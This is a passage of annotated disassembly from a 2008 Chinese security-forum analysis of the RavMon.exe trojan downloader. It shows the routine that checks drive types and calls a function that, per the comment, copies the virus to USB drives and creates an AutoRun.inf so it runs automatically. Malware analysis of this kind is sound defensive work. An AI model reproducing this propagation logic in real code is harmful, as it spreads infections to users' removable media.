00401521 .>mov ecx, dword ptr [esp+510]
00401528 .>mov edx, dword ptr [ecx+C]
0040152B .>push edx
0040152C .>mov dword ptr [esp+14], 0
00401534 .>call 00401CC0
00401539 .>lea edi, dword ptr [esp+14]
0040153D .>add esp, 4
00401540 .>mov byte ptr [esp+10], al
00401544 .>dec edi
00401545 >>mov al, byte ptr [edi+1]
00401548 .>inc edi
00401549 .>test al, al
0040154B .>jnz short 00401545
0040154D .>mov ax, word ptr [4091FC]
00401553 .>mov cl, byte ptr [4091FE]
00401559 .>lea edx, dword ptr [esp+10]
0040155D .>mov word ptr [edi], ax
00401560 .>push edx ; /RootPathName
00401561 .>mov byte ptr [edi+2], cl ; |
00401564 .>call dword ptr [4090D0] ; \GetDriveTypeA
0040156A .>sub eax, 2 ; Switch (cases 2..3)
0040156D .>je short 0040157E
0040156F .>dec eax
00401570 .>jnz short 00401590
00401572 .>push 0040B858 ; Case 3 of switch 0040156A
00401577 .>lea eax, dword ptr [esp+14]
0040157B .>push eax
0040157C .>jmp short 00401588
0040157E >>push 0040B858 ; Case 2 of switch 0040156A
00401583 .>lea ecx, dword ptr [esp+14]
00401587 .>push ecx
00401588 >>call 00401CE0 ;把病毒文件复制到U盘,并生成AutoRun.inf文件使U盘的病毒自动运
行
0040158D .>add esp, 8
00401590 >>xor eax, eax ; Default case of switch 0040156A
00401592 >>mov ecx, dword ptr [esp+4FC]
00401599 .>pop edi
0040159A .>pop esi
0040159B .>pop ebp
0040159C .>pop ebx
0040159D .>call 00403279
004015A2 .>add esp, 4F0
004015A8 .>retn 10
病毒文件的具体运行流程请看petnt大侠发表了“简单病毒RavMon.exe的分析”(
http://bbs.pediy.com/showthread.php?t=76310)一文附件图文并茂的分析,里面已经说得十分之详细。
- 标 题:木马下载器RavMon.exe病毒文件汇编源码分析
- 作 者:newjueqi
- 时 间:2008-11-12 15:55
- 链 接:http://bbs.pediy.com/showthread.php?t=76544